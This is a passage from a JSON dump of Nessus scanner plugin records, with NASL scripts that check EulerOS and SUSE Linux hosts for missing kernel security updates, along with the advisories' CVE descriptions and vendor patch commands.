script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-327.62.59.83.h154\",\n \"kernel-debug-3.10.0-327.62.59.83.h154\",\n \"kernel-debug-devel-3.10.0-327.62.59.83.h154\",\n \"kernel-debuginfo-3.10.0-327.62.59.83.h154\",\n \"kernel-debuginfo-common-x86_64-3.10.0-327.62.59.83.h154\",\n \"kernel-devel-3.10.0-327.62.59.83.h154\",\n \"kernel-headers-3.10.0-327.62.59.83.h154\",\n \"kernel-tools-3.10.0-327.62.59.83.h154\",\n \"kernel-tools-libs-3.10.0-327.62.59.83.h154\",\n \"perf-3.10.0-327.62.59.83.h154\",\n \"python-perf-3.10.0-327.62.59.83.h154\"];\n\nforeach (pkg in pkgs)\n if 
(rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:07:34", "bulletinFamily": "scanner", "description": "According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A flaw was found in the Linux kernel where the coredump\n implementation does not use locking or other mechanisms\n to prevent vma layout or vma flags changes while it\n runs. This allows local users to obtain sensitive\n information, cause a denial of service (DoS), or\n possibly have unspecified other impact by triggering a\n race condition with mmget_not_zero or get_task_mm\n calls.(CVE-2019-11599)\n\n - The Siemens R3964 line discipline driver in\n drivers/tty/n_r3964.c in the Linux kernel before 5.0.8\n has multiple race conditions.(CVE-2019-11486)\n\n - A race condition in perf_event_open() allows local\n attackers to leak sensitive data from setuid programs.\n As no relevant locks (in particular the\n cred_guard_mutex) are held during the\n ptrace_may_access() call, it is possible for the\n specified target task to perform an execve() syscall\n with setuid execution before perf_event_alloc()\n actually attaches to it, allowing an attacker to bypass\n the ptrace_may_access() check and the\n perf_event_exit_task(current) call that is performed in\n install_exec_creds() during privileged execve()\n calls.(CVE-2019-3901)\n\n - The atyfb_ioctl function in\n drivers/video/fbdev/aty/atyfb_base.c in the Linux\n kernel through 4.12.10 does not initialize a certain\n data structure, which allows local users to obtain\n 
sensitive information from kernel stack memory by\n reading locations associated with padding\n bytes.(CVE-2017-14156)\n\n - A flaw was found in the Linux kernel", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2019-1588.NASL", "href": "https://www.tenable.com/plugins/nessus/125515", "published": "2019-05-29T00:00:00", "title": "EulerOS 2.0 SP5 : kernel (EulerOS-SA-2019-1588)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125515);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/06/27 13:33:26\");\n\n script_cve_id(\n \"CVE-2017-14156\",\n \"CVE-2018-10876\",\n \"CVE-2018-12126\",\n \"CVE-2018-12127\",\n \"CVE-2018-12130\",\n \"CVE-2019-11091\",\n \"CVE-2019-11486\",\n \"CVE-2019-11599\",\n \"CVE-2019-3901\"\n );\n\n script_name(english:\"EulerOS 2.0 SP5 : kernel (EulerOS-SA-2019-1588)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A flaw was found in the Linux kernel where the coredump\n implementation does not use locking or other mechanisms\n to prevent vma layout or vma flags changes while it\n runs. 
This allows local users to obtain sensitive\n information, cause a denial of service (DoS), or\n possibly have unspecified other impact by triggering a\n race condition with mmget_not_zero or get_task_mm\n calls.(CVE-2019-11599)\n\n - The Siemens R3964 line discipline driver in\n drivers/tty/n_r3964.c in the Linux kernel before 5.0.8\n has multiple race conditions.(CVE-2019-11486)\n\n - A race condition in perf_event_open() allows local\n attackers to leak sensitive data from setuid programs.\n As no relevant locks (in particular the\n cred_guard_mutex) are held during the\n ptrace_may_access() call, it is possible for the\n specified target task to perform an execve() syscall\n with setuid execution before perf_event_alloc()\n actually attaches to it, allowing an attacker to bypass\n the ptrace_may_access() check and the\n perf_event_exit_task(current) call that is performed in\n install_exec_creds() during privileged execve()\n calls.(CVE-2019-3901)\n\n - The atyfb_ioctl function in\n drivers/video/fbdev/aty/atyfb_base.c in the Linux\n kernel through 4.12.10 does not initialize a certain\n data structure, which allows local users to obtain\n sensitive information from kernel stack memory by\n reading locations associated with padding\n bytes.(CVE-2017-14156)\n\n - A flaw was found in the Linux kernel's ext4 filesystem\n code. A use-after-free is possible in\n ext4_ext_remove_space() function when mounting and\n operating a crafted ext4 image.(CVE-2018-10876)\n\n - A flaw was found in the implementation of the 'fill\n buffer', a mechanism used by modern CPUs when a\n cache-miss is made on L1 CPU cache. If an attacker can\n generate a load operation that would create a page\n fault, the execution will continue speculatively with\n incorrect data from the fill buffer while the data is\n fetched from higher level caches. 
This response time\n can be measured to infer data in the fill buffer.\n (CVE-2018-12130)\n\n - Modern Intel microprocessors implement hardware-level\n micro-optimizations to improve the performance of\n writing data back to CPU caches. The write operation is\n split into STA (STore Address) and STD (STore Data)\n sub-operations. These sub-operations allow the\n processor to hand-off address generation logic into\n these sub-operations for optimized writes. Both of\n these sub-operations write to a shared distributed\n processor structure called the 'processor store\n buffer'. As a result, an unprivileged attacker could\n use this flaw to read private data resident within the\n CPU's processor store buffer. (CVE-2018-12126)\n\n - Microprocessors use a 'load port' subcomponent to\n perform load operations from memory or IO. During a\n load operation, the load port receives data from the\n memory or IO subsystem and then provides the data to\n the CPU registers and operations in the CPU's\n pipelines. Stale load operations results are stored in\n the 'load port' table until overwritten by newer\n operations. Certain load-port operations triggered by\n an attacker can be used to reveal data about previous\n stale requests leaking data back to the attacker via a\n timing side-channel. (CVE-2018-12127)\n\n - Uncacheable memory on some microprocessors utilizing\n speculative execution may allow an authenticated user\n to potentially enable information disclosure via a side\n channel with local access. (CVE-2019-11091)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1588\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e446bff5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-862.14.0.1.h178.eulerosv2r7\",\n \"kernel-debuginfo-3.10.0-862.14.0.1.h178.eulerosv2r7\",\n \"kernel-debuginfo-common-x86_64-3.10.0-862.14.0.1.h178.eulerosv2r7\",\n \"kernel-devel-3.10.0-862.14.0.1.h178.eulerosv2r7\",\n \"kernel-headers-3.10.0-862.14.0.1.h178.eulerosv2r7\",\n \"kernel-tools-3.10.0-862.14.0.1.h178.eulerosv2r7\",\n \"kernel-tools-libs-3.10.0-862.14.0.1.h178.eulerosv2r7\",\n 
\"perf-3.10.0-862.14.0.1.h178.eulerosv2r7\",\n \"python-perf-3.10.0-862.14.0.1.h178.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:25:38", "bulletinFamily": "scanner", "description": "The SUSE Linux Enterprise 12 SP2 kernel was updated to receive various\nsecurity and bugfixes.\n\nFour new speculative execution information leak issues have been\nidentified in Intel CPUs. (bsc#1111331)\n\nCVE-2018-12126: Microarchitectural Store Buffer Data Sampling (MSBDS)\n\nCVE-2018-12127: Microarchitectural Fill Buffer Data Sampling (MFBDS)\n\nCVE-2018-12130: Microarchitectural Load Port Data Samling (MLPDS)\n\nCVE-2019-11091: Microarchitectural Data Sampling Uncacheable Memory\n(MDSUM)\n\nThis kernel update contains software mitigations for these issues,\nwhich also utilize CPU microcode updates shipped in parallel.\n\nFor more information on this set of information leaks, check out\nhttps://www.suse.com/support/kb/doc/?id=7023736\n\nThe following security bugs were fixed: CVE-2018-1128: It was found\nthat cephx authentication protocol did not verify ceph clients\ncorrectly and was vulnerable to replay attack. Any attacker having\naccess to ceph cluster network who is able to sniff packets on network\ncould use this vulnerability to authenticate with ceph service and\nperform actions allowed by ceph service. (bnc#1096748).\n\nCVE-2018-1129: A flaw was found in the way signature calculation was\nhandled by cephx authentication protocol. 
An attacker having access to\nceph cluster network who is able to alter the message payload was able\nto bypass signature checks done by cephx protocol. (bnc#1096748).\n\nCVE-2016-8636: Integer overflow in the mem_check_range function in\ndrivers/infiniband/sw/rxe/rxe_mr.c allowed local users to cause a\ndenial of service (memory corruption), obtain sensitive information or\npossibly have unspecified other impact via a write or read request\ninvolving the ", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2019-1287-1.NASL", "href": "https://www.tenable.com/plugins/nessus/125282", "published": "2019-05-20T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2019:1287-1) (MDSUM/RIDL) (MFBDS/RIDL/ZombieLoad) (MLPDS/RIDL) (MSBDS/Fallout)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:1287-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125282);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/09/10 13:51:51\");\n\n script_cve_id(\"CVE-2016-8636\", \"CVE-2017-17741\", \"CVE-2017-18174\", \"CVE-2018-1091\", \"CVE-2018-1120\", \"CVE-2018-1128\", \"CVE-2018-1129\", \"CVE-2018-12126\", \"CVE-2018-12127\", \"CVE-2018-12130\", \"CVE-2018-19407\", \"CVE-2019-11091\", \"CVE-2019-11486\", \"CVE-2019-3882\", \"CVE-2019-8564\", \"CVE-2019-9503\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2019:1287-1) (MDSUM/RIDL) (MFBDS/RIDL/ZombieLoad) (MLPDS/RIDL) (MSBDS/Fallout)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 SP2 kernel was updated to receive various\nsecurity and 
bugfixes.\n\nFour new speculative execution information leak issues have been\nidentified in Intel CPUs. (bsc#1111331)\n\nCVE-2018-12126: Microarchitectural Store Buffer Data Sampling (MSBDS)\n\nCVE-2018-12127: Microarchitectural Fill Buffer Data Sampling (MFBDS)\n\nCVE-2018-12130: Microarchitectural Load Port Data Sampling (MLPDS)\n\nCVE-2019-11091: Microarchitectural Data Sampling Uncacheable Memory\n(MDSUM)\n\nThis kernel update contains software mitigations for these issues,\nwhich also utilize CPU microcode updates shipped in parallel.\n\nFor more information on this set of information leaks, check out\nhttps://www.suse.com/support/kb/doc/?id=7023736\n\nThe following security bugs were fixed: CVE-2018-1128: It was found\nthat cephx authentication protocol did not verify ceph clients\ncorrectly and was vulnerable to replay attack. Any attacker having\naccess to ceph cluster network who is able to sniff packets on network\ncould use this vulnerability to authenticate with ceph service and\nperform actions allowed by ceph service. (bnc#1096748).\n\nCVE-2018-1129: A flaw was found in the way signature calculation was\nhandled by cephx authentication protocol. An attacker having access to\nceph cluster network who is able to alter the message payload was able\nto bypass signature checks done by cephx protocol. 
(bnc#1096748).\n\nCVE-2016-8636: Integer overflow in the mem_check_range function in\ndrivers/infiniband/sw/rxe/rxe_mr.c allowed local users to cause a\ndenial of service (memory corruption), obtain sensitive information or\npossibly have unspecified other impact via a write or read request\ninvolving the 'RDMA protocol over infiniband' (aka Soft RoCE)\ntechnology (bnc#1024908).\n\nCVE-2017-18174: The amd_gpio_remove function in\ndrivers/pinctrl/pinctrl-amd.c calls the pinctrl_unregister function,\nleading to a double free (bnc#1080533).\n\nCVE-2018-1091: In the flush_tmregs_to_thread function in\narch/powerpc/kernel/ptrace.c, a guest kernel crash can be triggered\nfrom unprivileged userspace during a core dump on a POWER host due to\na missing processor feature check and an erroneous use of\ntransactional memory (TM) instructions in the core dump path, leading\nto a denial of service (bnc#1087231).\n\nCVE-2018-1120: By mmap()ing a FUSE-backed file onto a process's memory\ncontaining command line arguments (or environment strings), an\nattacker can cause utilities from psutils or procps (such as ps, w) or\nany other program which made a read() call to the /proc/<pid>/cmdline\n(or /proc/<pid>/environ) files to block indefinitely (denial of\nservice) or for some controlled time (as a synchronization primitive\nfor other attacks) (bnc#1093158).\n\nCVE-2019-11486: The Siemens R3964 line discipline driver in\ndrivers/tty/n_r3964.c has multiple race conditions (bnc#1133188).\n\nCVE-2019-3882: A flaw was found in the vfio interface implementation\nthat permits violation of the user's locked memory limit. 
If a device\nis bound to a vfio driver, such as vfio-pci, and the local attacker is\nadministratively granted ownership of the device, it may cause a\nsystem memory exhaustion and thus a denial of service (DoS)\n(bsc#1131427).\n\nCVE-2018-19407: The vcpu_scan_ioapic function in arch/x86/kvm/x86.c\nallowed local users to cause a denial of service (NULL pointer\ndereference and BUG) via crafted system calls that reach a situation\nwhere ioapic is uninitialized (bnc#1116841).\n\nCVE-2017-17741: The KVM implementation allowed attackers to obtain\npotentially sensitive information from kernel memory, aka a write_mmio\nstack-based out-of-bounds read, related to arch/x86/kvm/x86.c and\ninclude/trace/events/kvm.h (bnc#1073311).\n\nCVE-2019-9503, CVE-2019-8564: Multiple brcmfmac frame validation\nbypasses have been fixed (bnc#1132828, bnc#1132673).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1012382\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1024908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1034113\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1043485\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1068032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1073311\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1080157\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1080533\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082632\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1087231\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1087659\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1087906\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1093158\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1094268\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1096748\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1100152\"\n 
);\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1103186\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1106913\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1109772\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1111331\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1112178\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1113399\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1116841\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1118338\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119019\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1122822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1124832\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1125580\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1129279\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1131416\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1131427\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1131587\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1132673\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1132828\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1133188\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-8636/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-17741/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-18174/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-1091/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-1120/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-1128/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-1129/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-12126/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-12127/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-12130/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-19407/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-11091/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-11486/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-3882/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8564/\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-9503/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/support/kb/doc/?id=7023736\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20191287-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e4a87e55\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 7:zypper in -t patch\nSUSE-OpenStack-Cloud-7-2019-1287=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2019-1287=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2019-1287=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-BCL-2019-1287=1\n\nSUSE Linux Enterprise High Availability 12-SP2:zypper in -t patch\nSUSE-SLE-HA-12-SP2-2019-1287=1\n\nSUSE Enterprise Storage 4:zypper in -t patch\nSUSE-Storage-4-2019-1287=1\n\nOpenStack Cloud Magnum Orchestration 7:zypper in -t patch\nSUSE-OpenStack-Cloud-Magnum-Orchestration-7-2019-1287=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_121-92_109-default\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
